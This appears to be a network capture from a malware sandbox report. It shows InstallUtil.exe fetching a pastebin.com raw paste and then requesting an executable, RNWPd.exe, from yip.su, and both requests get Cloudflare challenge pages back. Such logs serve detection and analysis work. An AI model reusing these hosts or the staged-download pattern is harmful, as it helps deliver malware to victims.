2024-08-11 09:22:49 UTC	1369	IN	Data Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72 Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
2024-08-11 09:22:49 UTC	1369	IN	Data Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
2024-08-11 09:22:49 UTC	1369	IN	Data Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69 Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
2024-08-11 09:22:49 UTC	1369	IN	Data Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 34 30 37 33 27 2c 63 52 61 79 3a 20 27 38 62 31 37 32 39 64 31 38 63 66 35 37 64 30 35 27 2c 63 48 61 73 68 3a 20 27 63 65 38 39 39 62 34 61 39 31 62 32 62 62 64 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 62 66 6e 47 44 46 78 50 54 72 4d 4e 46 6d 48 51 66 30 6c 61 4e 4f 71 42 4e 69 65 34 59 64 61 6a 72 46 66 6c 4d 53 57 74 73 5f 59 2d 31 37 32 33 33 36 38 31 36 39 2d 30 2e 30 2e 31 2e 31 2d 33 36 34 36 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d 65 Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '4073',cRay: '8b1729d18cf57d05',cHash: 'ce899b4a91b2bbd',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=bfnGDFxPTrMNFmHQf0laNOqBNie4YdajrFflMSWts_Y-1723368169-0.0.1.1-3646",cFPWv: 'g',cTTime
2024-08-11 09:22:49 UTC	1369	IN	Data Raw: 68 42 4a 47 37 53 4b 37 59 79 45 2e 6e 6e 51 72 39 53 32 31 56 6e 75 6c 55 71 49 32 4b 6d 68 77 66 47 67 71 49 52 71 69 76 43 67 64 62 67 42 6a 68 7a 30 68 5a 5f 33 72 37 59 75 39 73 50 57 4c 44 39 64 67 46 4e 36 79 46 69 77 6d 69 66 68 79 49 7a 42 38 4f 45 48 36 65 5a 43 30 6d 74 4a 54 65 4e 47 32 46 6c 30 6c 48 33 50 4a 75 69 6e 47 4a 63 73 69 77 59 74 68 48 37 76 52 39 37 73 50 6f 75 69 79 73 4e 4e 61 37 6c 38 34 45 42 33 57 73 49 66 76 59 61 47 4c 6b 70 4a 35 5f 34 64 67 43 59 73 39 2e 43 68 4a 37 39 64 6c 35 66 59 35 49 6e 77 71 36 50 62 74 4d 33 39 45 59 34 7a 57 78 44 63 71 6c 53 43 48 70 73 70 6d 54 33 41 6e 71 34 78 67 41 42 6c 45 4e 65 32 77 44 30 67 79 4a 4f 75 70 51 67 64 45 54 7a 5a 72 73 6d 52 6b 54 37 51 50 67 37 5f 2e 4f 66 53 4b 42 79 36 Data Ascii: hBJG7SK7YyE.nnQr9S21VnulUqI2KmhwfGgqIRqivCgdbgBjhz0hZ_3r7Yu9sPWLD9dgFN6yFiwmifhyIzB8OEH6eZC0mtJTeNG2Fl0lH3PJuinGJcsiwYthH7vR97sPouiysNNa7l84EB3WsIfvYaGLkpJ5_4dgCYs9.ChJ79dl5fY5Inwq6PbtM39EY4zWxDcqlSCHpspmT3Anq4xgABlENe2wD0gyJOupQgdETzZrsmRkT7QPg7_.OfSKBy6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49735	172.67.19.24	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:22:54 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-08-11 09:22:54 UTC	222	IN	HTTP/1.1 200 OK Date: Sun, 11 Aug 2024 09:22:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8b1729f14cadc333-EWR
2024-08-11 09:22:54 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-11 09:22:54 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-08-11 09:22:54 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-08-11 09:22:54 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-08-11 09:22:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49736	188.114.97.3	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:22:54 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-08-11 09:22:54 UTC	1285	IN	HTTP/1.1 403 Forbidden Date: Sun, 11 Aug 2024 09:22:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-08-11 09:22:54 UTC	679	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 56 68 62 4d 62 50 47 2f 77 51 72 43 77 76 37 76 34 55 66 44 35 63 65 34 41 39 74 48 69 53 46 7a 61 45 55 37 43 75 59 71 78 41 54 57 55 53 35 7a 42 5a 59 44 34 68 69 47 57 4c 41 46 6a 70 68 73 6d 64 5a 43 79 32 76 44 48 4b 61 42 51 4c 65 56 74 34 51 54 37 6b 78 66 55 68 41 52 38 6b 6a 47 63 72 36 75 37 61 78 47 70 58 63 3d 24 72 6a 32 37 50 46 67 38 4f 41 74 34 4b 63 61 2f 45 46 42 2b 37 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 Data Ascii: cf-chl-out: VhbMbPG/wQrCwv7v4UfD5ce4A9tHiSFzaEU7CuYqxATWUS5zBZYD4hiGWLAFjphsmdZCy2vDHKaBQLeVt4QT7kxfUhAR8kjGcr6u7axGpXc=$rj27PFg8OAt4Kca/EFB+7w==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
2024-08-11 09:22:54 UTC	1369	IN	Data Raw: 33 62 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 3bfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2024-08-11 09:22:54 UTC	1369	IN	Data Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
2024-08-11 09:22:54 UTC	1369	IN	Data Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
2024-08-11 09:22:54 UTC	1369	IN	Data Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
2024-08-11 09:22:54 UTC	1369	IN	Data Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72 Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
2024-08-11 09:22:54 UTC	1369	IN	Data Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
2024-08-11 09:22:54 UTC	1369	IN	Data Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69 Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
